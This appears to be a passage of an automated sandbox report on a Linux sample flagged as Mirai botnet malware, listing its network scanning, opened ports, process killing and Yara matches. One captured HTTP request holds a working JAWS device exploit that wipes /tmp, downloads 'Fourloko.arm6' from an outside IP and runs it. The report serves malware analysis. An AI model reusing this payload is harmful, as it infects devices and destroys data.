      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 98.65.173.182:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 138.28.144.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 35.141.50.8:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 63.215.206.249:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 185.187.51.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 138.133.34.70:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.204.60.11:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.1.231.123:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 109.166.193.173:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 5.40.15.57:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 208.115.230.227:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 79.46.235.48:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 152.9.42.191:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 202.176.18.228:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 89.20.94.182:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.93.88.189:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 114.118.71.45:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 88.39.119.212:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 13.131.10.218:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 196.166.233.190:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 178.8.98.45:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 53.144.74.55:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 189.207.112.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 14.148.169.200:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 64.228.107.8:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 223.206.138.142:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 124.72.192.165:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 31.78.105.134:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 205.158.34.228:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 164.129.194.221:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 145.245.200.76:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 91.161.82.136:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 141.169.84.124:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 138.249.178.193:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 12.131.72.104:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 57.143.159.209:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 88.251.10.15:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 109.89.31.139:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 112.17.125.5:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 221.72.207.244:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 138.240.53.251:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 180.216.18.38:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 109.223.189.11:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 178.17.62.91:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 136.169.196.47:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 199.46.102.157:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.134.192.6:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 91.243.134.83:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 53.194.90.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 34.123.191.202:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 18.210.153.204:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 101.24.70.70:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 128.247.211.146:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 208.72.97.3:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 126.182.52.69:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 48.83.247.55:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 155.92.220.104:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 98.197.250.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 157.186.91.239:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 119.147.83.81:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 37.102.243.211:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 42.226.17.22:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 222.149.234.119:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 84.196.114.20:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 184.185.106.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 87.101.99.77:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.63.26.220:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 125.87.12.236:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 173.240.206.207:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 221.32.9.117:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 166.94.124.174:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 43.200.1.77:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 1.189.233.246:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 99.66.220.194:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 38.142.127.80:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 165.65.125.61:60001
      Source: /tmp/SLdtSSVlj2 (PID: 5267) Socket: 127.0.0.1::43829
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::0
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::8000
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::9000
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::8080
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::8081
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::53413
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::52869
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::37215
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::81
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::8089
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::8088
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::8083
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::443
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::4444
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::8001
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::49152
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::40960
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::1024
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::1337
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::420
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::23
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::0
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::80
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::60001
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::8000
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::9000
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::8080
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::8081
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::53413
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::52869
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::37215
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::81
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::8089
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::8088
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::8083
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::443
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::4444
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::8001
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::49152
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::40960
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::1024
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::1337
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::420
      Source: /lib/systemd/systemd-journald (PID: 5325) Socket: <unknown socket type>:unknown
      Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
        Server: JAWS/1.0 Jan 21 2017
        Content-Type: text/html; charset=UTF-8
        Content-length: 213
      Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1
        User-Agent: Hello, world
        Host: 127.0.0.1:80
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Connection: keep-alive

      System Summary:

      Malicious sample detected (through community Yara rule)
      Source: SLdtSSVlj2, type: SAMPLE, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
      Source: SLdtSSVlj2, type: SAMPLE, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
      Sample tries to kill multiple processes (SIGKILL)
      Source: SLdtSSVlj2, type: SAMPLE, Matched rule: SUSP_XORed_Mozilla, date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: SLdtSSVlj2, type: SAMPLE, Matched rule: Mirai_Botnet_Malware, date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: SLdtSSVlj2, type: SAMPLE, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2, date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5275.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla, date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5276.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla, date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla, date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Mirai_Botnet_Malware, date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2, date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla, date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Mirai_Botnet_Malware, date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2, date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5270.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla, date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla, date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Mirai_Botnet_Malware, date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2, date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla, date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Mirai_Botnet_Malware, date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2, date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla, date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Mirai_Botnet_Malware, date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2, date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5271.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla, date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5267.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla, date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla, date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Mirai_Botnet_Malware, date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2, date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5280.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla, date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5279.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla, date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla, date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Mirai_Botnet_Malware, date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2, date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5606, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5607, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5608, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5609, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5610, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5611, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5612, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5613, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5614, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 936, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 491, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 658, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 720, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 721, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 759, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 761, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 772, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 774, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 777, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 785, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 793, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 797, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1320, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1334, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1335, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1344, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1389, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1476, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1601, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1809, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1860, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1872, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1886, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1983, result: successfulJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 2038, result: successfulJump to behavior
      Source: ELF static info symbol of initial sample; .symtab present: no
      Source: classification engine; Classification label: mal100.spre.troj.lin@0/4@0/0

      Persistence and Installation Behavior:

      Sample reads /proc/mounts (often used for finding a writable filesystem)
      Source: /usr/bin/dbus-daemon (PID: 5309) File: /proc/5309/mounts
      Source: /bin/fusermount (PID: 5324) File: /proc/5324/mounts
      Source: /lib/systemd/systemd-journald (PID: 5325) Reads from proc file: /proc/meminfo